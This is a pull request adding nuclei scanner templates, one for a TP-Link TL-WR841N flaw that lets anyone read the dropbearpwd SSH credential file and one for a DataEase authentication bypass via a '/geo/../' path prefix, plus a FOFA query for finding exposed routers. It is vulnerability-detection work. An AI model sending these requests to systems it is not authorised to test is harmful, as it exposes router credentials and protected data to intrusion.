### PR TITLE
Add CVE-2024-56511 dataease

### DIFF
--- a/http/cves/2023/CVE-2023-50224.yaml
+++ b/http/cves/2023/CVE-2023-50224.yaml
@@ -1,0 +1,42 @@
+id: CVE-2023-50224
+
+info:
+  name: TP-Link TL-WR841N - Information Disclosure
+  author: burnt-brownies
+  severity: medium
+  description: |
+    TP-Link TL-WR841N routers vulnerable to information disclosure via improper authentication in the httpd service on port 80. A network-adjacent attacker can read the dropbearpwd file containing SSH credentials without any authentication.
+  impact: |
+    A network-adjacent attacker can read the dropbearpwd file containing SSH credentials without any authentication, leading to full router compromise.
+  remediation: Update router firmware to the latest version available from TP-Link's official support page.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-50224 
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-50224
+    - https://www.zerodayinitiative.com/advisories/ZDI-23-1808/
+    - https://www.tp-link.com/en/support/download/tl-wr841n/v12/#Firmware
+  classification:
+    cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2023-50224
+    cwe-id: CWE-290
+  metadata: 
+    verified: false
+    max-request: 1
+    vendor: tp-link
+    product: tl-wr841n
+  tags: cve,cve2023,tp-link,router,disclosure,iot
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tmp/dropbear/dropbearpwd"
+    matchers-condition: and
+    matchers: 
+      - type: status
+        status:
+          - 200
+      
+      - type: regex 
+        regex: 
+          - "root:.*:0:0"
+        part: body

--- a/http/cves/2023/CVE-2023-50224.yaml
+++ b/http/cves/2023/CVE-2023-50224.yaml
@@ -24,19 +24,34 @@ info:
     max-request: 1
     vendor: tp-link
     product: tl-wr841n
+    fofa-query: body="TL-WR841N" && icon_hash="-1028703177"
   tags: cve,cve2023,tp-link,router,disclosure,iot
+
+flow: http(1) && http(2)
 
 http:
   - method: GET
     path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(tolower(body), "tp-link", "tl-wr841n")'
+          - '!regex("root:.*:0:0", body)'
+        condition: and
+
+  - method: GET
+    path:
       - "{{BaseURL}}/tmp/dropbear/dropbearpwd"
+
     matchers-condition: and
     matchers: 
       - type: status
         status:
           - 200
       
-      - type: regex 
-        regex: 
+      - type: regex
+        regex:
           - "root:.*:0:0"
-        part: body

--- a/http/cves/2024/CVE-2024-56511.yaml
+++ b/http/cves/2024/CVE-2024-56511.yaml
@@ -1,0 +1,54 @@
+id: CVE-2024-56511
+
+info:
+  name: DataEase - Authentication Bypass
+  author: burnt-brownies
+  severity: critical
+  description: |
+    DataEase before version 2.10.4 is vulnerable to authentication bypass via improper URL filtering in TokenFilter. An attacker can prefix requests with /geo/../ to bypass authentication and access protected API endpoints without any credentials.
+  impact: |
+    An unauthenticated attacker can access all protected API endpoints including user management, data sources, and dashboards, potentially leading to full system compromise.
+  remediation: Upgrade DataEase to version 2.10.4 or later.
+  reference:
+    - https://github.com/dataease/dataease/security/advisories/GHSA-9f69-p73j-m73x
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-56511
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-56511
+    cwe-id: CWE-289
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: dataease
+    product: dataease
+  tags: cve,cve2024,dataease,auth-bypass,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/dataease/de2api/datasource/types"
+      - "{{BaseURL}}/geo/../dataease/de2api/datasource/types"
+    unsafe: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - '"code":0'
+          - "StarRocks"
+          - "impala"
+          - "mariadb"
+        part: body
+        condition: and
+
+      - type: word
+        words:
+          - "token is empty"
+          - "Internal Server Error"
+        part: body
+        condition: or
+        negative: true


### PR DESCRIPTION
### PR Information
- Added CVE-2024-56511 DataEase Authentication Bypass Template
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2024-56511
  - https://github.com/dataease/dataease/security/advisories/GHSA-9f69-p73j-m73x

### Template validation
- [x] Validated with a host running a vulnerable version and/or
configuration (True Positive)
- [ ] Validated with a host running a patched version and/or
configuration (avoid False Positive)

#### Additional Details
- Tested against Vulhub Docker environment (dataease:2.10.3)
- Template validated using: nuclei -validate
- Debug output confirms 3 matches found
- First request returns HTTP 500 (protected)
- Second request returns HTTP 200 (bypassed) with full datasource list
- verified: true
<img width="1846" height="1113" alt="CVE-2024-56511-nuclei-debug-output" src="https://github.com/user-attachments/assets/81ff2b52-6ad1-46ce-9158-c264981fdf02" />


### Additional References:
- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)[](url)